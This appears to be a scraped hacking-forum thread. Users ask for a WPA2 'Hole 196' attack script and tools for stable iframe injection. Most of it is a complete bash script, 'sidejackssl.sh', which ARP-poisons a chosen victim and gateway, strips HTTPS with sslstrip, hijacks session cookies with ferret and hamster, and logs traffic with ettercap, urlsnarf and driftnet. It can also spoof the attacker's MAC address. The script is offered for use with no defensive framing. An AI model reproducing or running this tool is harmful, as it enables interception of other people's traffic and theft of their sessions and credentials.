Glynec

There is a ready script that implements the attack Hole 196 ( http://www.slideshare.net/MdSohailAhmad/wpa-toohole196defcon18presentation )?

Thx!

I remember that he had a logo - a blue (or other color) radio antenna with waves (the logo was in ascii graphics). It's definitely not airoscript-ng. Who remembers?

Man's!)))

Inject Iframe. We need stability

What is the best and stable? Ettercap + filters? Squid? Mitmproxy (mitmproxy.org)? Or something else?

#!/bin/bash # sidejackssl.sh v0.2 # tested in backtrack 4 R2 environment, run as root. # xterm used for window control # arpspoof poisons a single victim and gateway # ferret and hamster for sidejacking # sslstrip for https # ettercap for everything else # urlsnarf to monitor visited urls # driftnet for fun # firefox needs to be configured with a proxy of 127.0.0.1:1234 # url for hamster server is http://hamster # by gorara # a few variables (do not change) m1="0" # missing file var m1 m2="0" # missing file var m2 m3="0" # missing file var m3 m4="0" # missing file var m4 quickclean="0" # used for quick clean up randmac="n" # default setting do not randomize MAC hamsterfile="hamster.txt" # hamster output file (you can't change it) trap 'cleanup' SIGINT SIGTERM # detect control-c # a few more variables (change these if required) # xterm window variables x="0" # x offset value y="0" # y offset value width="120" # width value height="7" # height value yoffset="120" # y offset fgcolor="white" # foreground color bgcolor="black" # background color # style variables warnstyle="[\e[01;38mw\e[00m]" # warning msgs style execstyle="[\e[01;32mx\e[00m]" # execute msgs style infostyle="[\e[01;34mi\e[00m]" # informational msgs style inputstyle="[\e[01;30m?\e[00m]" # input msgs style # file variables sslstripfile="sslstrip.log" # sslstrip output file name snifffile="sniff-*" # hamster sniff file wildcard etterfile="etter.cap" # ettercap output cap file temp="/tmp" # temporary dir function usage { clear echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]" echo "" echo " -i interface interface to use, ex. eth0, wlan0." echo " -t target the target IP address." echo " -g gateway the gateway IP address." echo " -r randomize your MAC address," echo " only use for wired interfaces." echo " -h display this help screen." echo "" echo " examples: " echo " bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r" echo " bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254" echo "" exit 0 } function cleanup() { echo -e "\n$warnstyle control-c pressed! " # exit script if nothing has been modified if [[ "$quickclean" = "1" ]]; then echo -e "$infostyle nothing changed, all done!" exit 0 fi echo -e "$infostyle cleaning up..." echo -e "$execstyle flushing iptables..." iptables -F iptables -t nat -F echo -e "$execstyle turning off IP forwarding..." echo "0" > /proc/sys/net/ipv4/ip_forward # change back MAC address to orignal one if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then echo -e "$execstyle resetting MAC address..."; echo -e "$infostyle original MAC is: $origmac" ifconfig $interface down ifconfig $interface hw ether $origmac ifconfig $interface up if [ -z $gw ]; then echo -e "$warnstyle WARNING, you have no default gateway!" else route add default gw $gw fi rm $temp/mac.orig rm $temp/gw.orig fi echo -e "$execstyle cleaning up files..." echo -e "$infostyle temp directory: " # testing to see if files exist, if so display them... if [ -f $temp/$sslstripfile ]; then ls $temp/$sslstripfile else #echo -e "$warnstyle missing $sslstripfile" m1="1" fi if [ -f $temp/$etterfile ]; then ls $temp/$etterfile else #echo -e "$warnstyle missing $etterfile" m2="1" fi echo -e "$infostyle current directory: " if [ -f $snifffile ]; then ls $snifffile else #echo -e "$warnstyle missing $snifffile" m3="1" fi if [ -f $hamsterfile ]; then ls $hamsterfile else #echo -e "$warnstyle missing $hamsterfile" m4="1" fi # testing to see if there are any files at all if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then while [[ "$delete" != "y" || "$delete" != "n" ]] echo -en "$infostyle delete file(s)? [y/n]: " read delete do case "$delete" in y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;; n) echo -e "$warnstyle nothing deleted!"; break;; *) echo -e "$warnstyle wrong selection!"; esac done # delete files as requested if [[ "$delete_marker" = "y" ]]; then if [ -f $temp/$sslstripfile ]; then rm $temp/$sslstripfile fi if [ -f $temp/$etterfile ]; then rm $temp/$etterfile fi if [ -f $snifffile ]; then rm $snifffile fi if [ -f $hamsterfile ]; then rm $hamsterfile fi fi else echo -e "$warnstyle nothing to delete!" fi echo -e "$infostyle all done!" exit 0 } # start main program if [ "$#" -eq 0 ]; then usage fi while [ "$#" -gt 0 ] do case "$1" in -i) interface=$2; shift 1;; -r) randmac="y"; shift 1;; -t) target=$2; shift 1;; -g) gateway=$2; shift 1;; -h) usage;; -*) usage; break;; *) break;; esac shift done # required parameters if [[ -z $interface || -z $target || -z $gateway ]]; then usage exit 0 fi clear if [[ "$randmac" = "y" ]]; then mac="yes" else mac="no" fi # set quick cleanup flag quickclean="1" echo -e "$infostyle sidejacker/sslstrip script v0.2, by gorara" echo -e "$infostyle ctrl-c to abort at any time." echo -e "$infostyle attack summary:" echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac" if [[ "$randmac" = "y" ]]; then echo -e "$execstyle change of $interface MAC address requested." if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then echo -e "$infostyle wireless device detected..." echo -e "$warnstyle can't change MAC address without taking wifi interface down" echo -e "$warnstyle do it manually before connecting to the AP." exit 0 fi if [[ "$interface" = eth* ]]; then echo -e "$infostyle wired device detected..." echo -e "$warnstyle WARNING, this will take your wired interface down temporarily." echo -en "$inputstyle do you want to continue? [y/n]: " read continue if [[ "$continue" = "y" ]]; then echo -e "$infostyle proceeding..." else echo -e "$infostyle exiting..." exit 0 fi fi origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}` fi # before this, ctrl-c will exit script without doing anything. quickclean="0" # use macchanger to randomize MAC address, ect. if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then echo -e "$execstyle randomizing MAC address..."; gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig ifconfig $interface down macchanger -r $interface > $temp/mac.orig ifconfig $interface up if [ -z $gw ]; then echo -e "$warnstyle WARNING, you have no default gateway!" else route add default gw $gw fi origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}` fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}` echo -e "$infostyle original MAC is: $origmac" echo -e "$infostyle faked MAC is: $fakemac" fi echo -e "$execstyle turning on IP Forwarding..." echo "1" > /proc/sys/net/ipv4/ip_forward echo -e "$execstyle configuring iptables..." iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 sleep 1 echo -e "$execstyle starting hamster ... <logging to: $hamsterfile>" xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster & sleep 2 echo -e "$execstyle starting ferret ... <logging to: console>" y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface & sleep 2 echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>" y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -a -k -f -w $temp/$sslstripfile & sleep 2 echo -e "$execstyle starting ettercap ... <logging to: console>" y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -T -q -p -i $interface & sleep 2 echo -e "$execstyle starting urlsnarf ... <logging to: console>" y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface & sleep 2 echo -e "$execstyle starting driftnet ... <logging to: console>" y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "driftnet" -e driftnet -p -i $interface & sleep 2 echo -e "$infostyle trap is ready, now to direct traffic..." echo -e "$execstyle ARP poisoning the target..." y=$(($y+$yoffset)) xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway & sleep 1 echo -e "$infostyle run firefox and type http://hamster" echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234" echo -e "$infostyle press ctrl-c to exit and clean up... \n" for ((;;)) do read loop echo -en "$infostyle press ctrl-c to terminate!" done exit 0 Powered by bt4 - does not work on bt5 (((